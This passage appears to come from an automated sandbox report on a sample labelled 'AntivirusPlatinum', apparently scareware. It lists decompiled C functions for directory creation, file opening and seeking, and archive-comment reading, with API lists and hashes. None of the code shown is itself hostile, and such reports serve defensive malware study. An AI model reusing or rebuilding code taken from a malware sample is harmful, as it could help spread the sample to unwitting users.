                                                                                                                                                      						_t9 = 2;
                                                                                                                                                      						return _t9;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _t8 - 3;
                                                                                                                                                      					if(_t8 == 3) {
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					return 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t20 = _a12;
                                                                                                                                                      					if(_a12 != 0) {
                                                                                                                                                      						E004057E8(_t20, _a4, _t14, _a16);
                                                                                                                                                      					}
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}








                                                                                                                                                      0x0040589c
                                                                                                                                                      0x004058a1
                                                                                                                                                      0x004058a6
                                                                                                                                                      0x004058c2
                                                                                                                                                      0x004058b2
                                                                                                                                                      0x004058b5
                                                                                                                                                      0x004058b5
                                                                                                                                                      0x004058ca
                                                                                                                                                      0x004058e2
                                                                                                                                                      0x004058e8
                                                                                                                                                      0x004058eb
                                                                                                                                                      0x004058f7
                                                                                                                                                      0x004058f9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004058f9
                                                                                                                                                      0x004058ed
                                                                                                                                                      0x004058f0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004058cc
                                                                                                                                                      0x004058cc
                                                                                                                                                      0x004058d0
                                                                                                                                                      0x004058d9
                                                                                                                                                      0x004058d9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004058de

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000400,00000000,00000000,?,004059B4,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058B5
                                                                                                                                                      • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000,?,004059B4,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058C2
                                                                                                                                                      • GetLastError.KERNEL32(?,004059B4,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDirectory$ErrorLastVersion
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4238167203-0
                                                                                                                                                      • Opcode ID: 0cc14ccfb548368e6c29571d1dbba05db44bbe5f082422575866692aa1a22338
                                                                                                                                                      • Instruction ID: 59de209e465ca692b93f1b9bd8997e8896771fb0caf9f8e2694668fec01ab97a
                                                                                                                                                      • Opcode Fuzzy Hash: 0cc14ccfb548368e6c29571d1dbba05db44bbe5f082422575866692aa1a22338
                                                                                                                                                      • Instruction Fuzzy Hash: 5EF0AF32101A0476EB257A209C09BAB3A68EF05750F14C433FD02F51E0D7788871EE9E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E0040AAC2(void* __ecx, intOrPtr _a4, int _a8) {
                                                                                                                                                      				struct _ITEMIDLIST* _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				intOrPtr* _t12;
                                                                                                                                                      
                                                                                                                                                      				__imp__SHGetMalloc( &_v12, __ecx, __ecx);
                                                                                                                                                      				SHGetSpecialFolderLocation(0, _a8,  &_v8); // executed
                                                                                                                                                      				__imp__SHGetPathFromIDListA(_v8, _a4); // executed
                                                                                                                                                      				_t12 = _v12;
                                                                                                                                                      				return  *((intOrPtr*)( *_t12 + 0x14))(_t12, _v8);
                                                                                                                                                      			}






                                                                                                                                                      0x0040aacb
                                                                                                                                                      0x0040aada
                                                                                                                                                      0x0040aae6
                                                                                                                                                      0x0040aaec
                                                                                                                                                      0x0040aaf9

                                                                                                                                                      APIs
                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 0040AACB
                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 0040AADA
                                                                                                                                                      • SHGetPathFromIDListA.SHELL32(?,?), ref: 0040AAE6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FolderFromListLocationMallocPathSpecial
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 628029987-0
                                                                                                                                                      • Opcode ID: 70809a305a85a622d48bfe35fb9c38ef5d9240c8d15e14ba5eed05ab10784309
                                                                                                                                                      • Instruction ID: 88ba9e9cb9406764b26f187acffb5ba189f573144994a3fa657e37118bd86729
                                                                                                                                                      • Opcode Fuzzy Hash: 70809a305a85a622d48bfe35fb9c38ef5d9240c8d15e14ba5eed05ab10784309
                                                                                                                                                      • Instruction Fuzzy Hash: E2E0C276500109FFDF05DFD0DE09EDE7B79EB08205F104060F605D6120D6719A24DB20
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 69%
                                                                                                                                                      			E004018CB(void* __ecx, void* __edx, void* __edi, CHAR** _a4, long _a8) {
                                                                                                                                                      				char _v28;
                                                                                                                                                      				long _t27;
                                                                                                                                                      				signed int _t29;
                                                                                                                                                      				long _t30;
                                                                                                                                                      				signed int _t35;
                                                                                                                                                      				signed int _t48;
                                                                                                                                                      				long _t50;
                                                                                                                                                      				long _t67;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				CHAR** _t70;
                                                                                                                                                      
                                                                                                                                                      				_t69 = __ecx;
                                                                                                                                                      				if( *((char*)(__ecx + 0x6d8b)) != 0) {
                                                                                                                                                      					E0040A7E9( &_v28, __edx, __ecx);
                                                                                                                                                      					__eflags =  *(_t69 + 0x4694) & 0x00000002;
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_push(0);
                                                                                                                                                      					if(( *(_t69 + 0x4694) & 0x00000002) == 0) {
                                                                                                                                                      						_push(( *(_t69 + 0x4696) & 0x0000ffff) +  *((intOrPtr*)(_t69 + 0x6d94)) + 7);
                                                                                                                                                      						E004054ED(_t69);
                                                                                                                                                      						_t27 = E00402790(_t69, __edx, __eflags, "CMT");
                                                                                                                                                      						__eflags = _t27;
                                                                                                                                                      						if(_t27 == 0) {
                                                                                                                                                      							L11:
                                                                                                                                                      							_t48 = 0;
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      							L12:
                                                                                                                                                      							E0040A810( &_v28);
                                                                                                                                                      							_t29 = _t48;
                                                                                                                                                      							L13:
                                                                                                                                                      							return _t29;
                                                                                                                                                      						}
                                                                                                                                                      						_t30 = E00401722(_t69, _a4, _a8); // executed
                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                      							goto L11;
                                                                                                                                                      						}
                                                                                                                                                      						_t48 = 1;
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					_push( *((intOrPtr*)(_t69 + 0x6d94)) + 0x14);
                                                                                                                                                      					E004054ED(_t69);
                                                                                                                                                      					E00401CE5(_t69, __edx, __eflags);
                                                                                                                                                      					_t70 = _a4;
                                                                                                                                                      					_t50 = _t70[1];
                                                                                                                                                      					__eflags = _t50;
                                                                                                                                                      					if(_t50 > 0) {
                                                                                                                                                      						OemToCharBuffA( *_t70,  *_t70, _t50);
                                                                                                                                                      						_t67 = _a8;
                                                                                                                                                      						__eflags = _t67;
                                                                                                                                                      						if(_t67 != 0) {
                                                                                                                                                      							E004016BF(_t67, _t50 + 1);
                                                                                                                                                      							E004016A4(_t70, 0);
                                                                                                                                                      							E0040E144( *_t70,  *_t67, _t50 + 1);
                                                                                                                                                      							E00401708(_t70, _t50);
                                                                                                                                                      							E004016BF(_t67, E0040E321( *_t67));
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t35 = E0040A810( &_v28);
                                                                                                                                                      					__eflags = _t70[1];
                                                                                                                                                      					_t29 = _t35 & 0xffffff00 | _t70[1] > 0x00000000;
                                                                                                                                                      					goto L13;
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}













                                                                                                                                                      0x004018d2
                                                                                                                                                      0x004018db
                                                                                                                                                      0x004018e9
                                                                                                                                                      0x004018ee
                                                                                                                                                      0x004018f5
                                                                                                                                                      0x004018f7
                                                                                                                                                      0x004018f9
                                                                                                                                                      0x00401990
                                                                                                                                                      0x00401993
                                                                                                                                                      0x0040199f
                                                                                                                                                      0x004019a4
                                                                                                                                                      0x004019a6
                                                                                                                                                      0x004019bd
                                                                                                                                                      0x004019bd
                                                                                                                                                      0x004019bd
                                                                                                                                                      0x004019bf
                                                                                                                                                      0x004019c2
                                                                                                                                                      0x004019c7
                                                                                                                                                      0x004019c9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004019c9
                                                                                                                                                      0x004019b0
                                                                                                                                                      0x004019b5
                                                                                                                                                      0x004019b7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004019b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004019b9
                                                                                                                                                      0x00401908
                                                                                                                                                      0x0040190b
                                                                                                                                                      0x00401912
                                                                                                                                                      0x00401917
                                                                                                                                                      0x0040191a
                                                                                                                                                      0x0040191d
                                                                                                                                                      0x0040191f
                                                                                                                                                      0x00401927
                                                                                                                                                      0x0040192d
                                                                                                                                                      0x00401930
                                                                                                                                                      0x00401932
                                                                                                                                                      0x0040193a
                                                                                                                                                      0x00401943
                                                                                                                                                      0x00401950
                                                                                                                                                      0x00401958
                                                                                                                                                      0x00401967
                                                                                                                                                      0x00401967
                                                                                                                                                      0x0040196c
                                                                                                                                                      0x00401973
                                                                                                                                                      0x00401978
                                                                                                                                                      0x0040197a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040197a
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BuffChar
                                                                                                                                                      • String ID: CMT
                                                                                                                                                      • API String ID: 1973267554-2756464174
                                                                                                                                                      • Opcode ID: 2e9d570f032067c190e5b78061e61d6a7d6deba71149c226ed3cc396c12f8cc3
                                                                                                                                                      • Instruction ID: fbbbaea41a28c93ea3a5d1c6e8216a3bc702e01cd4883bdb15f1a6495baf4321
                                                                                                                                                      • Opcode Fuzzy Hash: 2e9d570f032067c190e5b78061e61d6a7d6deba71149c226ed3cc396c12f8cc3
                                                                                                                                                      • Instruction Fuzzy Hash: 2E21E5717002106BDB10AB21CD91EAF739D9F44708F04442FF856B72E2DB39AD12C799
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                      			E00404F2E(void* __ecx) {
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				int _t22;
                                                                                                                                                      				signed int _t23;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      
                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                      				_t24 = 1;
                                                                                                                                                      				if( *(__ecx + 0xc) == 0) {
                                                                                                                                                      					_t18 =  *(__ecx + 4);
                                                                                                                                                      					if(_t18 == 0xffffffff) {
                                                                                                                                                      						L14:
                                                                                                                                                      						 *((intOrPtr*)(_t30 + 0xc1c)) =  *((intOrPtr*)(_t30 + 0xc1c)) + 1;
                                                                                                                                                      						return _t24;
                                                                                                                                                      					}
                                                                                                                                                      					if( *((char*)(__ecx + 0x10)) != 0) {
                                                                                                                                                      						L11:
                                                                                                                                                      						 *(_t30 + 4) =  *(_t30 + 4) | 0xffffffff;
                                                                                                                                                      						if(_t24 == 0 &&  *((intOrPtr*)(_t30 + 0x14)) != _t24) {
                                                                                                                                                      							_t15 = _t30 + 0x17; // 0x17
                                                                                                                                                      							E004032D5(0x414c7c, _t15);
                                                                                                                                                      						}
                                                                                                                                                      						goto L14;
                                                                                                                                                      					}
                                                                                                                                                      					_t22 = FindCloseChangeNotification(_t18); // executed
                                                                                                                                                      					asm("sbb bl, bl");
                                                                                                                                                      					_t24 =  ~(_t22 - 1) + 1;
                                                                                                                                                      					if(1 != 0 ||  *0x414c70 == 0) {
                                                                                                                                                      						_t23 = 0;
                                                                                                                                                      						while( *(0x414870 + _t23 * 4) != _t30) {
                                                                                                                                                      							_t23 = _t23 + 1;
                                                                                                                                                      							if(_t23 < 0x100) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      							goto L11;
                                                                                                                                                      						}
                                                                                                                                                      						 *(0x414870 + _t23 * 4) =  *(0x414870 + _t23 * 4) & 0x00000000;
                                                                                                                                                      					}
                                                                                                                                                      					goto L11;
                                                                                                                                                      				}
                                                                                                                                                      				 *(__ecx + 0xc) =  *(__ecx + 0xc) & 0x00000000;
                                                                                                                                                      				goto L14;
                                                                                                                                                      			}








                                                                                                                                                      0x00404f30
                                                                                                                                                      0x00404f36
                                                                                                                                                      0x00404f38
                                                                                                                                                      0x00404f40
                                                                                                                                                      0x00404f46
                                                                                                                                                      0x00404fa1
                                                                                                                                                      0x00404fa1
                                                                                                                                                      0x00404fab
                                                                                                                                                      0x00404fab
                                                                                                                                                      0x00404f4c
                                                                                                                                                      0x00404f86
                                                                                                                                                      0x00404f86
                                                                                                                                                      0x00404f8c
                                                                                                                                                      0x00404f93
                                                                                                                                                      0x00404f9c
                                                                                                                                                      0x00404f9c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404f8c
                                                                                                                                                      0x00404f4f
                                                                                                                                                      0x00404f5a
                                                                                                                                                      0x00404f5c
                                                                                                                                                      0x00404f5e
                                                                                                                                                      0x00404f69
                                                                                                                                                      0x00404f6b
                                                                                                                                                      0x00404f74
                                                                                                                                                      0x00404f7a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404f7c
                                                                                                                                                      0x00404f7e
                                                                                                                                                      0x00404f7e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404f5e
                                                                                                                                                      0x00404f3a
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,004054A9,?,?,?,004032B2,?,00414C7C,0040339B,00000002,?,0040501E,?), ref: 00404F4F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                      • String ID: |LA
                                                                                                                                                      • API String ID: 2591292051-4290591017
                                                                                                                                                      • Opcode ID: 6f0d0f8878a62e980662d6e6074bd5ba14a99120c2933f954b287655d349c058
                                                                                                                                                      • Instruction ID: fb12770f161869685dacc0fb60d23730991de6ff872b0f0e221dcc50feffd473
                                                                                                                                                      • Opcode Fuzzy Hash: 6f0d0f8878a62e980662d6e6074bd5ba14a99120c2933f954b287655d349c058
                                                                                                                                                      • Instruction Fuzzy Hash: 6701D4F01517118FE3309A34A5587A37798A796322F104B3FD6E2D36D0D37CA8868B49
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004051D8(void* __ecx, CHAR* _a4, WCHAR* _a8, struct _SECURITY_ATTRIBUTES* _a12) {
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				WCHAR* _t36;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      
                                                                                                                                                      				_t34 = __ecx;
                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                      				if(_a12 != 0) {
                                                                                                                                                      					L2:
                                                                                                                                                      					_a12 = 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					_a12 = 0;
                                                                                                                                                      					if( *((intOrPtr*)(__ecx + 0x16)) != 0) {
                                                                                                                                                      						goto L2;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t22 = E00406EA5();
                                                                                                                                                      				_t36 = _a8;
                                                                                                                                                      				if(_t22 == 0 || _t36 == 0 ||  *_t36 == 0) {
                                                                                                                                                      					_t23 = CreateFileA(_a4, 0xc0000000, _a12, 0, 2, 0, 0); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t23 = CreateFileW(_t36, 0xc0000000, _a12, 0, 2, 0, 0);
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t37 + 4) = _t23;
                                                                                                                                                      				 *((char*)(_t37 + 0x12)) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                                                                                                                      				 *((char*)(_t37 + 0x10)) = 0;
                                                                                                                                                      				if(_t36 == 0) {
                                                                                                                                                      					 *((short*)(_t37 + 0x418)) = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					E0040E338(_t37 + 0x418, _t36);
                                                                                                                                                      				}
                                                                                                                                                      				_t25 = _t37 + 0x17;
                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                      					E0040E115(_t34, _t36, _t25, 0x1000000);
                                                                                                                                                      				} else {
                                                                                                                                                      					E0040A477(_t25, _a4);
                                                                                                                                                      				}
                                                                                                                                                      				E00404F07(_t37,  *(_t37 + 4));
                                                                                                                                                      				return 0 |  *(_t37 + 4) != 0xffffffff;
                                                                                                                                                      			}








                                                                                                                                                      0x004051d8
                                                                                                                                                      0x004051e0
                                                                                                                                                      0x004051e5
                                                                                                                                                      0x004051ef
                                                                                                                                                      0x004051ef
                                                                                                                                                      0x004051e7
                                                                                                                                                      0x004051e7
                                                                                                                                                      0x004051ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004051ed
                                                                                                                                                      0x004051f6
                                                                                                                                                      0x004051fb
                                                                                                                                                      0x00405200
                                                                                                                                                      0x00405231
                                                                                                                                                      0x0040520b
                                                                                                                                                      0x00405219
                                                                                                                                                      0x00405219
                                                                                                                                                      0x00405237
                                                                                                                                                      0x0040523a
                                                                                                                                                      0x0040523e
                                                                                                                                                      0x00405241
                                                                                                                                                      0x00405246
                                                                                                                                                      0x00405259
                                                                                                                                                      0x00405248
                                                                                                                                                      0x00405250
                                                                                                                                                      0x00405250
                                                                                                                                                      0x00405260
                                                                                                                                                      0x00405266
                                                                                                                                                      0x0040527a
                                                                                                                                                      0x00405268
                                                                                                                                                      0x0040526c
                                                                                                                                                      0x0040526c
                                                                                                                                                      0x00405284
                                                                                                                                                      0x00405296

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000000,00000000,?,00000045,00000001,?,00404EB3,00000045,?,00000001,00000045), ref: 00405219
                                                                                                                                                      • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000000,00000000,?,00000045,00000001,?,00404EB3,00000045,?,00000001,00000045), ref: 00405231
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: ec04e94c21e6327de585a74cc546da97f01177137bb2f8558239996e927b6dc1
                                                                                                                                                      • Instruction ID: db8e20e7d0df6165b05d6c65c26f56ad29c5289aa69bd9df7c45a2987c6c6b35
                                                                                                                                                      • Opcode Fuzzy Hash: ec04e94c21e6327de585a74cc546da97f01177137bb2f8558239996e927b6dc1
                                                                                                                                                      • Instruction Fuzzy Hash: BF21CF71000748BFEB209F60CC85FAB7BA8EF40744F04897EF551A6281C7789D649F69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E00405351(void* __ecx, long _a4, long _a8, signed int _a12) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      				long _t19;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				long _t28;
                                                                                                                                                      				long _t31;
                                                                                                                                                      
                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t25 = __ecx;
                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
                                                                                                                                                      					L12:
                                                                                                                                                      					_t15 = 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t28 = _a8;
                                                                                                                                                      					_t31 = _t28;
                                                                                                                                                      					if(_t31 <= 0 && (_t31 < 0 || _a4 < 0) && _a12 != 0) {
                                                                                                                                                      						if(_a12 != 1) {
                                                                                                                                                      							_t21 = E0040554A(_t22, _t23, __eflags);
                                                                                                                                                      						} else {
                                                                                                                                                      							_t21 = E00404FDC(_t22, _t23);
                                                                                                                                                      						}
                                                                                                                                                      						_a4 = _a4 + _t21;
                                                                                                                                                      						asm("adc esi, edx");
                                                                                                                                                      						_a12 = _a12 & 0x00000000;
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = _t28;
                                                                                                                                                      					_t19 = SetFilePointer( *(_t25 + 4), _a4,  &_v8, _a12); // executed
                                                                                                                                                      					if(_t19 != 0xffffffff || GetLastError() == 0) {
                                                                                                                                                      						goto L12;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t15 = 0;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t15;
                                                                                                                                                      			}











                                                                                                                                                      0x00405351
                                                                                                                                                      0x00405354
                                                                                                                                                      0x00405356
                                                                                                                                                      0x0040535c
                                                                                                                                                      0x004053be
                                                                                                                                                      0x004053be
                                                                                                                                                      0x0040535e
                                                                                                                                                      0x0040535f
                                                                                                                                                      0x00405362
                                                                                                                                                      0x00405364
                                                                                                                                                      0x00405378
                                                                                                                                                      0x00405381
                                                                                                                                                      0x0040537a
                                                                                                                                                      0x0040537a
                                                                                                                                                      0x0040537a
                                                                                                                                                      0x00405386
                                                                                                                                                      0x00405389
                                                                                                                                                      0x0040538b
                                                                                                                                                      0x0040538b
                                                                                                                                                      0x0040539e
                                                                                                                                                      0x004053a4
                                                                                                                                                      0x004053ae
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004053ba
                                                                                                                                                      0x004053ba
                                                                                                                                                      0x004053ba
                                                                                                                                                      0x004053ae
                                                                                                                                                      0x004053c2

                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(?,000000FF,?,?,?,00000000,?,?,00405501,?,?,?,?,0040941C,000000FF), ref: 004053A4
                                                                                                                                                      • GetLastError.KERNEL32(00405501,?,?,?,?,0040941C,000000FF,?,00000000,00000000,?,00000000,00000001,00000000,00000000,?), ref: 004053B0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                      • Opcode ID: ed057684c9aded8822d7a98cc1ab320d41f793df05a2235f4b6bd6fd049a5b35
                                                                                                                                                      • Instruction ID: f3af7dc040878406d74d12ace788650f613bc42b46e0a769c9035ee9dabafcab
                                                                                                                                                      • Opcode Fuzzy Hash: ed057684c9aded8822d7a98cc1ab320d41f793df05a2235f4b6bd6fd049a5b35
                                                                                                                                                      • Instruction Fuzzy Hash: AA018031400B14EFCB148E54C8056EF7769FB003A4F10823AFD25A22D0C7F89951DE99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405767(void* __eflags, CHAR* _a4, WCHAR* _a8) {
                                                                                                                                                      				long _t6;
                                                                                                                                                      				WCHAR* _t8;
                                                                                                                                                      
                                                                                                                                                      				if(E00406EA5() == 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					_t6 = GetFileAttributesA(_a4); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t8 = _a8;
                                                                                                                                                      					if(_t8 == 0 ||  *_t8 == 0) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t6 = GetFileAttributesW(_t8);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return 0 | _t6 != 0xffffffff;
                                                                                                                                                      			}





